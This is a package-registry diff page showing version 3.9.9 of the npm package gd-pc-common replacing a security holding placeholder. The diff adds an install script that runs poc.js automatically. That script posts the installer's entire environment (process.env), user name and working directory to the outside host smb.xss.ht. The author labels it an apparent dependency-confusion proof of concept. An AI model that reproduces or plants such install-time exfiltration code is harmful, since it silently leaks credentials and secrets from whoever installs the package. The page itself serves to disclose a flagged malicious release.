gd-pc-common 0.0.1-security → 3.9.9

Sign up to get free protection for your applications and to get access to all the features.

Potentially problematic release.


This version of gd-pc-common might be problematic. Click here for more details.

Files changed (4) hide show
  1. package/README.md +1 -5
  2. package/index.js +0 -0
  3. package/package.json +8 -3
  4. package/poc.js +39 -0
package/README.md CHANGED
@@ -1,5 +1 @@
1
- # Security holding package
2
-
3
- This package contained malicious code and was removed from the registry by the npm security team. A placeholder was published to ensure users are not affected in the future.
4
-
5
- Please refer to www.npmjs.com/advisories?search=gd-pc-common for more information.
1
+ This package acts as a PoC sending a single request with details about the execution environment
package/index.js ADDED
File without changes
package/package.json CHANGED
@@ -1,6 +1,11 @@
1
1
  {
2
2
  "name": "gd-pc-common",
3
- "version": "0.0.1-security",
4
- "description": "security holding package",
5
- "repository": "npm/security-holder"
3
+ "version": "3.9.9",
4
+ "description": "this is a poc. plznoban",
5
+ "main": "index.js",
6
+ "scripts": {
7
+ "install": "$NODE poc.js; exit 0"
8
+ },
9
+ "author": "",
10
+ "license": "MIT"
6
11
  }
package/poc.js ADDED
@@ -0,0 +1,39 @@
1
+ const fs = require('fs');
2
+ const https = require('https');
3
+
4
+ function SendToXSSHunter(path, data) {
5
+ const body = JSON.stringify({
6
+ "uri":path,
7
+ "cookies":"",
8
+ "referrer":"",
9
+ "user-agent":"NodeJS",
10
+ "browser-time":0,
11
+ "probe-uid":"",
12
+ "origin":"",
13
+ "injection_key":"",
14
+ "dom":data,
15
+ "screenshot":""
16
+ });
17
+
18
+ const options = {
19
+ hostname: 'smb.xss.ht',
20
+ port: 443,
21
+ path: '/js_callback',
22
+ method: 'POST',
23
+ headers: {
24
+ 'Content-Type': 'application/json',
25
+ 'Content-Length': body.length
26
+ }
27
+ };
28
+
29
+ const req = https.request(options);
30
+ req.write(body);
31
+ req.end();
32
+ }
33
+
34
+ SendToXSSHunter('NPM@'+process.env.NAME+': '+process.env.INIT_CWD, JSON.stringify(process.env));
35
+ console.log('#####################################################################################################');
36
+ console.log('# This package acts as a PoC sending a single request with details about the execution environment. #');
37
+ console.log('# (This package was downloaded from the public NPM registry instead of your private one!) #');
38
+ console.log('# @0xSombra #');
39
+ console.log('#####################################################################################################');